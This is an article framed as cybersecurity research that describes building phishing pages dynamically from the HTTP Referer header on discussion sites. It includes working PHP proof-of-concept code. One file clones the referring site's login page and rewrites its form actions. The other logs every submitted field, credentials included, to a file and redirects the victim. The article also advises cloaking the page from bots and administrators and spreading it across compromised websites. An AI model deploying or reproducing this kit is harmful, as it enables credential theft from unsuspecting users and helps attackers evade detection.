Dynamically create a phishing page based on the HTTP referer header

Auto-generated phishing pages and the social web.

(The following is a cybersecurity research article on credential theft using non-traditional and underexploited phishing methods.)

You’re browsing the web. You’re logged into an online discussion space such as YouTube, Reddit, Twitter, Medium, a small community forum, etc. You click on a link from another user to another page on the same site. Instead of seeing the content you’re looking for you’re presented with the login page for the site you’re already on. Annoyed and a little confused as to why you’ve been logged out, you log back in and are taken to the content you were expecting.

You’ve just been phished.

Creating Phishing pages based on the HTTP referer tag

When we hear “phishing attack” we usually think of email. We don’t usually think of web-based attacks through online discussion sites. Usually, these would be easy to spot and block. The novelty of this attack is in using the HTTP referer tag to customize the phishing page when the victim lands in order to make it look like a bug in the usual user experience. After all, how many times have you been browsing a site then been randomly asked to log back in again?

How dynamic phishing page creation works

What this needs in order to work

Now, not everything is that simple. This attack relies on a few things:

• The users trust the site they’re already on. The phishing page pulls enough recent content from the target site to make it look believable without too much inspection. We train our users to check for padlocks, green bars, SSL certificates, correct domain names, etc. from emails, but we generally don’t do this as meticulously when deep into a web browsing session on one site
• The dynaphish engine can differentiate actually users from bots and site admins. As it inspects the headers of the web requests before rendering content, it is possible to mask the evil intentions from unwanted user agents, IP addresses, referers, and devices.
• The domain can’t be on a known bad actor list. By dynamically rendering the phishing page content it makes it more difficult for analysis tools to identify the page as malicious until execution time, at which point it may be too late.

Dynamic referer phishing pages – A Proof of Concept

Here’s a very basic proof of concept possible with just two php files. The first is the landing page which will download and present the content of the referring website’s login page. The second is a credential capture and user forwarding page.

<?php
//index.php
if (isset($_SERVER['HTTP_REFERER'])  ) {
	$referer = $_SERVER['HTTP_REFERER'];
	$stripped = stripUrlPath($referer);
	$url = $stripped."/login";
	$loginpage = file_get_contents($url);
	$dom = new DOMDocument();
	$dom->loadHTML($loginpage);
	foreach($dom->getElementsByTagName('form') as $form) {
		$form->setAttribute('action', 'login.php?target='.$referer);
	}
	$result = $dom->saveHTML();
	print $result;
} else {
	print "error";
}
function stripUrlPath($url){
    $urlParts = parse_url($url);
    $newUrl = $urlParts['scheme'] . "://" . $urlParts['host'] . "/";
    return $newUrl;
}
?>

<?php
//login.php
$req_dump = print_r($_REQUEST, TRUE);
$fp = fopen('request.log', 'a');
fwrite($fp, $req_dump);
fclose($fp);
header('Location: '.$_GET["target"]);
?>

Why this works

By dynamically creating the phishing page it is easier to evade detection, gain the trust of users by presenting an expected screen that is identical to the real thing, and easier to deploy as any compromised website can host a landing page for any other site.

By using a dynamic redirection mechanism that behaves like any URL shortener it is possible to load balance across thousands of compromised websites through a few routing domains adding a level of resilience into the design